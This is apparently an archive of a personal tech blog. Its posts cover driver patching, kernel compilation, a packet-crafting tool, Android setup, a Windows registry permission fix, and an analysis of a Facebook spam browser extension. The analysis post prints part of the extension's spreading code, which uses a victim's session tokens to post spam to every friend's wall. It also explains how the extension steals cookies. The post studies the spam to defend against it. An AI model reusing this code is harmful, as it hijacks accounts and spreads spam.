Wednesday, August 14, 2013

How to install Alfa Network card on Matriux Krypton and later

This is just an experimental solution and been worked around with other Linux groups

extract the drivers for kernel 3.0+

edit the following files:

and search for the
#include for smp_lock.h
(one in each file). Comment out or delete the line and save the files.


void daemonize(char *, char *);
just before these lines:

inline static void thread_enter(void *context)
    //struct net_device *pnetdev = (struct net_device *)context;
    //daemonize("%s", pnetdev->name);
    daemonize("%s", "RTKTHREAD");

Friday, May 18, 2012

Compile Debian Kernel (Squeeze) 3.0 and Above with Aufs and squashfs

This tutorial is intended for all who are facing problem with patching the aufs modules using the old methods (2.6.x)

Prerequisites :

Debian (belief that same process holds for Ubuntu)
And again ABC of Linux


Open up a terminal

make a directory "linux":

mkdir /root/linux

Install all the packages required to build to kernel

aptitude update && aptitude install dkms kernel-package libncurses5-dev wget bzip2 fake-root build-essential 

Download the latest sources from (3.3.6 were the latest while this post was written) by typing the following in terminal

Step 4:

Extract the sources to the folder we made earlier

tar xvf linux-3.3.6.tar.bz2 /root/linux
Step5 :

Download the aufs modules and create a patch

mkdir /tmp/aufs
cd /tmp/aufs
git clone git:// aufs3-standalone.git
cd aufs3-standalone.git
git checkout origin/aufs3.3
mkdir ../a ../b
cp -r Documentation ../b
cp -r fs ../b
cp -r include ../b
rm ../b/include/linux/Kbuild
cd ..
diff -rupN a/ b/ > /root/linux/aufs.patch
cat aufs3-standalone.git/*.patch >> /root/linux/aufs.patch 

Step 6:

Apply the patch

cd /root/linux
patch -p1 < aufs.patch

 Step 7:

Now start the build process

make clean and make mrproper
Step 8 i: ( if you want to have the same config of your existing kernel)

Configuring the kernel :

If you wish to have the same config of your previous existing kernel follow the steps

cp /boot/config-`uname -r` ./.config
this will load the existing kernel config file

now type

make menuconfig
Step 8 ii : ( if you want to have a custom config of your own)

Configuring the kernel :

copy your custom made .config to the current directory

and type
make menuconfig

Step 9:

You will now be displayed with a screen

Go to Load an Alternate Configuration File and choose .config (this is the .config file we copied to our directory in step 8) and press OK.

Step 10:

Now we will make our own custom kernel

make-kpkg clean fakeroot make-kpkg --initrd --stem extraversion  --revision revision  --append-to-version=-customversion kernel_image kernel_headers

You need to give these 3 values of your own in the above command:
 "extraversion - give your own extraversion for kernel
 revision- the revision you want the kernel to be
customversion   - the custom revision of the kernel "

And sit back for a couple of hours since it takes time

After successful compilation of the kernel you will see two .deb packages in the ../ folder
1. Kernel image file .deb
2. Kernel Header file .deb

Step 11:

Install them by typing the following commands

dpkg -i linux-image-*
dpkg -i linux-headers-*
 (you may type the whole file name as dpkg -i linux-image-3.3.6-custom_3.3.6-custom-1.00.custom_i386.deb depending on whatever is generated in your case) .

Restart your system and you should see your kernel in the grub menu or else verify the kernel version with

uname -a

Congrats you have successfully compiled the Linux kernel for Debian and its derivatives :))

Note:If you face any issues comment this post and i will reply you. 

Monday, March 12, 2012

Ostinato - Wireshark in Reverse

This is a brief introduction on Ostinato, an open-source, network packet crafter/traffic generator and analyzer with a very easy to use GUI. Like it says, it aims to be reverse the ofWireshark. What could be done with Ostinato? Generate the traffic, craft and analyze Specify your own Hex Dump Create and configure multiple packet streams with stream rates, bursts, packets over multiple ports and computers using a single client Capture and view the packets alongside wireshark. Let's get started!! Ostinato can be found in MatriuxArsenal as Arsenal => Scanning => Ostinato
This starts up a GUI which is very quick and easy to use (Figure 2).
 Figure 2 

 Move around the port groups (either expand the list or create a new port group from the file menu) Right click over the column in the right side and create a new stream as shown in the figure below (Figure 3).
 Figure 3

  Click over the tools option and configure the packets to be generated. Go ahead and choose all the options you prefer. (protocols, data stream, source, destination).
 Figure 4 

Click OK and also Apply button over the top right corner of the window otherwise these settings would fail (Figure 5). 

 Figure 5 

 Now we are ready to go for generating the packet traffic. Click on the port you just applied and click the start button.. This will now start transmitting the traffic You can capture the traffic that is being transmitted my selecting the configured port group and clicking on the capture button (Figure 6). 
 Figure 6

 This traffic can be analyzed over wireshark by clicking the view captured files button over there (Figure 7).
 Figure 7 

 So I hope you go head and try all the options in the Ostinato tool and play around with it.

This article was published in CHmag as a part of Matriux Vibhag

Tuesday, December 13, 2011

Analysis of a Facebook spam exploited through browser add-ons

This whitepaper is an analysis of Facebook spam exploited through browser add-ons and extensions. which can found as PDF for download at

Though spam on Facebook is not new to us, however I find this particular spam leveraged very smartly and it was a very interesting analysis to me because I was surprised to see what extent the spammers can go. Today one of my friends on Facebook was so annoyed with this spam which was posting on all his friends walls, which looked like this:

I was asked what to do, looking at it, it surely looked to be just like every other spam I suggested him all the usual measures like remove all his Facebook applications that are doubtful and clear his browser data. But it continued even after that so I decided to look into it.
First the URL, the spam seems to be originated from http://, looking at the blog it looked like this,

Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).

So decided to look into the page source, here is what it contained:

So this would install the browser add-on/extension based on the browser, the else part of the code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look into:

 Navigating to it I found

Another script at finally this was the Final script ;)
Now let’s analyze this script,
Remember the else part earlier in the first code snippet which I promised to discuss later? It contained a link now the file extra.js also contains this part to redirect the user to this URL after the installation of the add-on/extension, navigating to that link I found

This page actually contained that video embedded; finally the person must be happy to see this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)

As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls

Further analyzing the code,

The code here assigns some random variables for the post so that it won’t be similar on all the walls. So using all the variables post_form_id to var p3 make large combinations (use of mathematical combinations, smart eh?).

Looking into the main part of the code where the message is generated and sent for post..,

for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = '';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = '';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};

Further looking into the above snippet of code it is clear that it uses the grabbed cookies to post the spam on others walls, this script also contained an unfinished part left out (may be the spammer was happy with this for now or grab some time from the user to finish the spam effectively) with a link to  which looked like,

 However looking into the source it didn’t contain any script or rather it was a static page with the content actually an image file.

Though social networking sites often fall prey to such scams/spams it is much of users consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is genuine video from a valid link, in this case,

  1.      Looking at the post the link from where the post originated is clearly (underlined black)
    2.   Further the thumbnail preview for videos has been changed the play button now is transparent black while the one in the spam we discussed had a blue play button (underlined red)
    3.   Always install extensions from known sources
    a.       Chrome – from chrome store
    b.      Firefox – Mozilla add-ons
    4.      Use add-ons like no-script, No-Ads to avoid such scripts.
    5.      Stay away from scams/spams that promise to provide some gift or money.  

Saturday, October 29, 2011

Setting Up Android SDK in Eclipse on Windows

This tutorial contains step by step procedure to Setup Android SDK on a windows machine.

Please read the prerequisites and installation requirements of each software before proceeding.

Download Android SDK from and install it . 

You can install any among the two types available .zip or .exe as the site says - yes it is preferable to download the .exe as which is easy .

After you install Android SDK download the latest Eclipse

Any among the following two are good for android basic development

Unzip the eclipse ( i consider that you can setup the eclipse path ...etc.,)

Start Eclipse and Install the Android Development Tools (ADT) by

Help >> Install new software.

and add the link  and name it ADT

Select Developer Tools and click next, if you get some error in the next step like org.eclipse.wst.sse.core 0.0.0

Do the following else skip to next step

1. Go to Help->Install New Software
2. Click on "Available Software Sites"
3. Set "check" on check box - (for helios - Eclipse 3.7)

Then again try installing the ADT

Just accept the license terms and Finish the installation of ADT it may show up few warnings regarding the plugin verification, accept it and restart Eclipse after installation

After the restart you would see a popup like this

Select the path where android SDK was installed or you can also install a new SDK if you haven't done that before, finish the installation and you should see the highlighted items in the toolbar of eclipse

That means you have successfully setup Android SDK in Eclipse

Now Click on Android SDK manager and select the Android platforms you want to choose for your development and install them as shown below

That is it !!!

Go ahead developing your android applications!

Thursday, September 29, 2011

Fix Windows Error While Installing : Cannot open registry key

Recently I was trying to install Windows Office 2010 by performing an upgrade over the existing Office 2007 it took too long and decided to stop the installation and manually uninstall 2007 then go for 2010 fresh installation. However when I tried to uninstall 2007 there was some issue and I was not able to remove it.

I tried manually deleting Office 2007 files and also removing all its temp and reference files in the disk. This worked fine but when I tried to install 2010. I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying as I realized that the registry rights were screwed , little Google search told me that I have to get SubInACL [ Download ] However that meant I had to fix all the registries
So I found a cool script on addictive tips by Ghaus Iftikar Nakodari , So here is what you do :

Copy the SubInACL.exe from the place it installed to C:\Windows\system32

Now write the following in a notepad and save it as registryfix.cmd

subinacl /subkeyreg HKEY_LOCAL_MACHINE /setowner=administrators
subinacl /subkeyreg HKEY_CURRENT_USER /setowner=administrators
subinacl /subkeyreg HKEY_CLASSES_ROOT /setowner=administrators
subinacl /subkeyreg HKEY_LOCAL_MACHINE /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CURRENT_USER /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CLASSES_ROOT /grant=administrators=f /grant=system=f
 Right click on the file and run it as administrator, it should take a while before it fixes all the registry keys. Do not close or interrupt the process while it runs.

Ref :